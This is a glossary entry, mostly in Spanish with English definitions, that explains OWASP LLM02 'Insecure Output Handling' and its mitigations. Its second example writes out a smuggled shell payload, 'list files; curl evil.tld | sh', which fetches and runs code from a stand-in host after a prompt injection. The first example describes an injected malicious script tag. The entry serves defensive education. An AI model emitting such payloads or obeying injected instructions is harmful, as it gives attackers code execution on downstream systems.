Insecure Output Handling
¿Qué es Insecure Output Handling?
Insecure Output HandlingOWASP LLM02 — passing LLM-generated output directly into downstream systems (browsers, shells, SQL, code execution) without validation, turning a hallucination or prompt injection into XSS, RCE, or SSRF.
Insecure Output Handling is item LLM02 in the OWASP Top 10 for LLM Applications. It captures a deceptively simple mistake: treating model output as trusted text. When an application renders LLM responses in HTML, evaluates them as JavaScript, concatenates them into shell commands, executes them as code, or stuffs them into SQL, an attacker who can influence the prompt (directly or indirectly via retrieved content) controls whatever downstream sink consumes that output. The model becomes a confused-deputy that crosses trust boundaries on behalf of the attacker. Mitigations are conventional appsec hygiene applied to the LLM's egress: escape, sanitize, or template all output before HTML rendering; refuse to execute model-generated code outside a sandbox; validate structured outputs (e.g. JSON Schema, function-call argument types) before dispatch; require explicit allowlists for tools that take string arguments; and treat the LLM as an untrusted parser of intent, not a trusted producer of code.
● Ejemplos
- 01
A markdown chatbot renders model output as HTML; an injection causes it to emit a malicious script tag that fires for every viewer.
- 02
An assistant returns a shell command that the app pipes into bash; a prompt injection turns 'list files' into 'list files; curl evil.tld | sh'.
● Preguntas frecuentes
¿Qué es Insecure Output Handling?
OWASP LLM02 — passing LLM-generated output directly into downstream systems (browsers, shells, SQL, code execution) without validation, turning a hallucination or prompt injection into XSS, RCE, or SSRF. Pertenece a la categoría de Seguridad de IA y ML en ciberseguridad.
¿Qué significa Insecure Output Handling?
OWASP LLM02 — passing LLM-generated output directly into downstream systems (browsers, shells, SQL, code execution) without validation, turning a hallucination or prompt injection into XSS, RCE, or SSRF.
¿Cómo funciona Insecure Output Handling?
Insecure Output Handling is item LLM02 in the OWASP Top 10 for LLM Applications. It captures a deceptively simple mistake: treating model output as trusted text. When an application renders LLM responses in HTML, evaluates them as JavaScript, concatenates them into shell commands, executes them as code, or stuffs them into SQL, an attacker who can influence the prompt (directly or indirectly via retrieved content) controls whatever downstream sink consumes that output. The model becomes a confused-deputy that crosses trust boundaries on behalf of the attacker. Mitigations are conventional appsec hygiene applied to the LLM's egress: escape, sanitize, or template all output before HTML rendering; refuse to execute model-generated code outside a sandbox; validate structured outputs (e.g. JSON Schema, function-call argument types) before dispatch; require explicit allowlists for tools that take string arguments; and treat the LLM as an untrusted parser of intent, not a trusted producer of code.
¿Cómo defenderse de Insecure Output Handling?
Las defensas contra Insecure Output Handling combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para Insecure Output Handling?
Nombres alternativos comunes: LLM02, Unsanitized LLM output.
● Términos relacionados
- ai-security№ 870
OWASP LLM Top 10
Lista mantenida por OWASP con los diez riesgos de seguridad más críticos para aplicaciones construidas sobre grandes modelos de lenguaje.
- ai-security№ 969
Inyección de prompts
Ataque que anula las instrucciones originales de un LLM al introducir texto adversarial en el prompt, haciendo que el modelo ignore sus salvaguardas o ejecute acciones del atacante.
- ai-security№ 586
Inyección indirecta de prompts
Variante de inyección de prompts en la que las instrucciones maliciosas se ocultan en contenido de terceros (páginas, documentos, correos) que el LLM consume posteriormente mediante recuperación, navegación o herramientas.
- attacks№ 265
Cross-Site Scripting (XSS)
Vulnerabilidad web que permite a un atacante inyectar scripts maliciosos en páginas vistas por otros usuarios, ejecutándose en el navegador de la víctima bajo el origen del sitio.
- attacks№ 224
Inyección de comandos
Ataque en el que la entrada del usuario se pasa sin saneamiento a un intérprete del sistema, haciendo que la aplicación ejecute comandos proporcionados por el atacante.
- ai-security№ 1285
Tool-Use Injection
Attacks that manipulate an LLM agent's tool-calling layer — forging tool arguments, smuggling instructions through tool outputs, or coaxing the model into calling unsanctioned tools.